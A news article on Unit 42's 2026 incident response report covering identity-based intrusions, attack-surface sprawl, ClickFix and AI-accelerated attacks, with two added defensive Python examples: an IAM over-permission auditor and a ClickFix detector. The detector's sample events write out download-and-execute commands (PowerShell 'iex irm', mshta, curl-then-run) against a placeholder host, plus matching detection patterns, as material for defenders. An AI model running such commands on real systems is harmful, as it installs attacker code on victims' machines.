Vast majority of breaches enabled by preventable gaps and identity weaknesses, says Palo Alto Networks

Identity controls and a better understanding of the attack surface are key to rebuffing increasingly dangerous cyber attacks

A visualization of a green padlock surrounded by open orange padlocks, to represent identity attacks.
(Image credit: Getty Images)

Enterprises are falling prey to cyber attacks largely due to lack of oversight, preventable errors, and poor identity controls, even as AI attacks become a reality.

This is according to Palo Alto Networks’ Global Incident Response Report 2026, produced by its Unit 42 cyber threat intelligence team, which draws on data from over 750 incidents reported to the company between October 2024 and September 2025.

In the past year alone, researchers found weak identity controls played a meaningful role in 90% of cyber incidents, with attackers leaning on identity as the most reliable entry point and mechanism for lateral movement.

Indeed, in nearly two-thirds (65%) of cases attackers used identity-based attacks as the initial access point into enterprise systems, with 33% of attacks beginning with phishing and social engineering.

Within this subset of cases, session hijacking and MFA bypass techniques allowed threat actors to gain access to victims’ systems quickly. Attackers also relied on tried-and-tested entry techniques, including previously stolen credentials (13%), brute force attacks (8%), and insider attacks (8%).

Researchers analyzed over 680,000 cloud identities and discovered that 99% of users, services, and roles had excessive permissions, enabling attackers to easily complete lateral movement through corporate networks after compromising an account.
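As an added illustration of what "excessive permissions" looks like in practice, the Python below scans a constructed set of IAM-style policy documents for the grants that hand an attacker a lateral-movement path once the identity is compromised. This is example code written for this page, not Unit 42's analysis tooling; the identity names and policies are invented, the policy shape follows the AWS IAM JSON format, and the privilege-escalation action list is a small illustrative subset rather than a complete catalogue.

```python
"""Audit IAM-style policy documents for over-broad grants.

Constructed example: the identities and policies below are made up for
illustration and follow the AWS IAM policy document shape.
"""
import fnmatch

# Constructed sample: four cloud identities and their attached policies.
SAMPLE_IDENTITIES = {
    "ci-deploy-role": {
        "Version": "2012-10-17",
        "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
    },
    "billing-reader": {
        "Version": "2012-10-17",
        "Statement": [
            {"Effect": "Allow", "Action": ["ce:GetCostAndUsage"], "Resource": "*"}
        ],
    },
    "app-service": {
        "Version": "2012-10-17",
        "Statement": [
            {"Effect": "Allow", "Action": ["s3:GetObject"],
             "Resource": "arn:aws:s3:::app-bucket/*"},
            # Scoped read above, but the statement below lets the service hop
            # into any role in the account: a classic lateral-movement path.
            {"Effect": "Allow", "Action": ["iam:PassRole", "sts:AssumeRole"],
             "Resource": "*"},
        ],
    },
    "log-writer": {
        "Version": "2012-10-17",
        "Statement": [
            {"Effect": "Allow", "Action": ["logs:PutLogEvents"],
             "Resource": "arn:aws:logs:eu-west-1:123456789012:log-group:/app/*"}
        ],
    },
}

# Illustrative subset (assumption, not a full list): actions that let a
# principal grant itself more access or assume another identity.
PRIVILEGE_ESCALATION_ACTIONS = {
    "iam:*", "iam:PassRole", "iam:CreateAccessKey", "iam:AttachUserPolicy",
    "iam:AttachRolePolicy", "iam:PutUserPolicy", "iam:PutRolePolicy",
    "sts:AssumeRole",
}


def _as_list(value):
    """IAM allows a bare string or a list in Action/Resource; normalise."""
    return value if isinstance(value, list) else [value]


def find_excessive_grants(policy):
    """Return (reason, statement) pairs for every risky Allow statement."""
    findings = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue  # Deny statements only narrow access
        actions = _as_list(stmt.get("Action", []))
        resources = _as_list(stmt.get("Resource", []))
        if "NotAction" in stmt:
            # "Everything except X" is almost always broader than intended.
            findings.append(("NotAction allow-list grants everything not named", stmt))
            continue
        if any(a == "*" for a in actions):
            findings.append(("wildcard action", stmt))
        elif any(a.endswith(":*") for a in actions):
            findings.append(("service-wide wildcard action", stmt))
        # Escalation actions are only a problem when unscoped; fnmatch lets
        # the pattern "iam:*" in the list match any iam action.
        if "*" in resources and any(
            any(fnmatch.fnmatch(a, pat) for pat in PRIVILEGE_ESCALATION_ACTIONS)
            for a in actions
        ):
            findings.append(("privilege-escalation action on all resources", stmt))
    return findings


def audit(identities):
    """Map identity name -> findings; an empty list means nothing flagged."""
    return {name: find_excessive_grants(pol) for name, pol in identities.items()}


def excessive_share(identities):
    """Fraction of identities with at least one risky grant."""
    report = audit(identities)
    flagged = sum(1 for findings in report.values() if findings)
    return flagged / len(report) if report else 0.0


if __name__ == "__main__":
    for name, findings in audit(SAMPLE_IDENTITIES).items():
        status = "OK" if not findings else "; ".join(r for r, _ in findings)
        print(f"{name:16s} {status}")
    print(f"share over-permissioned: {excessive_share(SAMPLE_IDENTITIES):.0%}")
```

The check is deliberately structural: it looks at what a policy would allow, not at what the identity has actually used. Pairing it with access-history data (which actions were exercised over the last 90 days) is what turns "this role can assume anything" into a concrete list of permissions to remove.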

Back to basics with identity security

Chris George, managing director EMEA at Unit 42, told ITPro that leaders must thoroughly examine their existing identity policies and be “brilliant at the basics” to close these preventable gaps.

“What user accounts do you have? What is your password policy? How are you making sure that you're choosing non-brute-forceable passwords? How are you looking at the permissions?”

Mastering the basics may be the bare minimum for businesses, as the number of machine identities they have to manage balloons with the deployment of AI agents.

In October ITPro heard from Haider Pasha, EMEA CISO at Palo Alto Networks, who noted that agentic AI will seriously complicate identity security and requires rigorous oversight to be used safely.

George told ITPro that his team has observed over-provisioned AI copilots, which let attackers extract sensitive information simply by crafting malicious prompts.

“[W]hen we get to the whole agentic side of things, and we've got AI agents that are going to be in their tens, hundreds of thousands, then if each single agent has got a connection to something and has got permission to do things, how are you managing the security around that?”

In the future, George said, threat actors may replicate the kind of ‘living off the land’ techniques we’re currently seeing used against mobile device management (MDM) tools and leaders must ensure their AI systems aren’t compromised.

But he added that even more sophisticated methods such as the malicious use of deepfakes rely on the age-old processes of business email compromise, for which we have established security protocols.

Incidents included in the report’s data cover a wide range of organizations, including Fortune 500 enterprises, government bodies, and SMBs, across over 50 countries.

The attack surface is widening

There’s evidence that attackers are widening the net in a bid to achieve greater success against victims, with 87% of intrusions found to involve attacks on two or more attack surfaces and 67% involving activity across three or more.

After identity, the most common attack surfaces were endpoints (61%) and the network (50%). Researchers also found that in nearly half (48%) of all investigations browser activity was targeted, up from 44% in 2024.

For example, researchers cited an incident involving the ClickFix attack technique, in which threat actors used SEO poisoning to trick an employee at an international industrial firm into executing malicious code. The goal was to run malware in system memory in order to install an infostealer on the employee’s work device.
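The ClickFix chain described above leaves a recognisable trace in endpoint telemetry: the lure gets the user to paste a command into the Run dialog or a terminal, so a script interpreter is spawned by a shell or browser rather than by an installer or scheduler, and its command line fetches remote content and runs it in memory. The Python below, written for this page as an added example and not taken from the report or from any Unit 42 tooling, scores constructed process-creation events on those signals. The event field names are a simplified, hypothetical schema (map them to the ParentImage/Image/CommandLine fields of Sysmon event ID 1 or your EDR's equivalent), the hosts are fictitious, and the example goes slightly beyond the article's case by also flagging a browser-spawned download that does touch disk.

```python
"""Flag ClickFix-style executions in process-creation telemetry.

Added example with constructed events. Field names (pid, parent_image,
image, command_line) are a hypothetical simplified schema.
"""
import re

# Constructed sample: two ClickFix-style chains, two benign admin actions,
# and one browser-spawned downloader (the on-disk variant).
SAMPLE_EVENTS = [
    {"pid": 4412, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -c "iex (irm https://example.invalid/verify.txt)"'},
    {"pid": 4420, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://example.invalid/captcha.hta"},
    {"pid": 5101, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -Command "Get-Service -Name Spooler"'},
    {"pid": 5230, "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"pid": 4431, "parent_image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c curl https://example.invalid/update.exe -o %TEMP%\u.exe & %TEMP%\u.exe"},
]

# Parents a user-pasted command typically runs under (Run dialog = explorer).
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# Fetching remote content on the command line.
REMOTE_FETCH = re.compile(
    r"(?i)\b(irm|iwr|invoke-webrequest|invoke-restmethod|downloadstring|"
    r"downloadfile|curl|wget|mshta)\b.*https?://")
# Executing what was fetched, or an encoded payload, without writing a script.
IN_MEMORY_EXEC = re.compile(
    r"(?i)\b(iex|invoke-expression)\b|-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}")
# Hiding the window or skipping the user profile / interactive mode.
HIDDEN_WINDOW = re.compile(r"(?i)-w(?:indowstyle)?\s+h(?:idden)?\b|-nop\b|-noni\b")


def _basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(event):
    """Return (score, reasons); each independent ClickFix signal adds one."""
    image = _basename(event["image"])
    if image not in INTERPRETERS:
        return 0, []
    reasons = []
    if _basename(event["parent_image"]) in INTERACTIVE_PARENTS:
        reasons.append("interpreter spawned from shell/browser (Run dialog pattern)")
    cmd = event["command_line"]
    if REMOTE_FETCH.search(cmd):
        reasons.append("fetches remote content")
    if IN_MEMORY_EXEC.search(cmd):
        reasons.append("executes fetched/encoded code in memory")
    if HIDDEN_WINDOW.search(cmd):
        reasons.append("hides window / skips profile")
    return len(reasons), reasons


def detect(events, threshold=2):
    """Events scoring at or above threshold, as (pid, reasons) pairs."""
    hits = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            hits.append((event["pid"], reasons))
    return hits


if __name__ == "__main__":
    for pid, reasons in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: " + "; ".join(reasons))
```

A threshold of two keeps a plain `powershell -Command` from a terminal quiet while still catching a single remote-fetch-and-execute line from explorer.exe. The in-memory signal is what matters for the incident above: an infostealer that never lands as a file will not trip file-based antivirus, so the command line and parent relationship are the evidence you have.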

Supply chain attacks are another severe risk for enterprises. Attackers are increasingly exploiting SaaS environments, which rely on a complex web of interdependencies and permissions linked by APIs and OAuth apps, as well as legitimate vendor tools and open source dependencies.

Almost a quarter (23%) of incidents tracked by researchers in 2025 involved SaaS applications, compared to just 6% in 2022, while 39% of command and control (C2) techniques were linked directly to remote access tools running with administrator privileges.

Addressing these vulnerabilities will mean taking stock of all systems, permissions, and interdependencies to build a holistic view of one’s attack surface. But George told ITPro that many organizations still struggle with simply cataloguing their systems, let alone protecting them.

“You see, actually, in conversations we've had with the board, they say ‘we didn't even know we had the affected system, because we just don't have it documented’.

“There's a concept of a CMDB – a configuration management database, a list of everything in the company that they own. I’ve very rarely seen anything that's been 100% complete and kept up to date.”

To start with, he said, leaders have to strategize where they can make the most impact in the short term and then think about more radical overhaul.

AI has become a force multiplier – for good and for ill

In addition to traditional attack methods, researchers found threat actors are increasingly using AI to enhance the speed and severity of attacks.

The report noted that AI, particularly models hosted on adversary infrastructure, has been used to identify unpatched vulnerabilities as little as 15 minutes after a CVE is published, as well as to reduce the manual work needed to run ransomware campaigns.

In lab tests conducted in 2025, Unit 42 was able to use AI to reduce time-to-exfiltration to just 25 minutes. In the real world, attackers are on a similar trajectory, having reduced the figure from 4.8 hours to just 72 minutes from 2024 to 2025.

AI is also used to improve grammar for phishing lures, as well as to produce attack strategies. This lines up with recent reports by other organizations such as Google Threat Intelligence Group, which recently found APTs are using public AI models to translate and localize social engineering messages.

To counter the threat, Palo Alto Networks recommended organizations deploy automated patching, AI-driven security detection and response tools, as well as better monitoring of API calls and internal AI use.

For example, George pointed to the 72 minutes it now takes attackers to move from initial access to data exfiltration – a time frame that can’t be countered without some form of automation.

With greater controls over AI deployment and a focus on leveraging its benefits to empower security teams, he argued that there’s clear hope for defenders.

“AI is, and it will, change the world – there is a huge amount of opportunity.

“But I could say that about every technological change throughout history and I think we should be taking lessons from all of those and refining our approach.”

Rory Bathgate
Features and Multimedia Editor
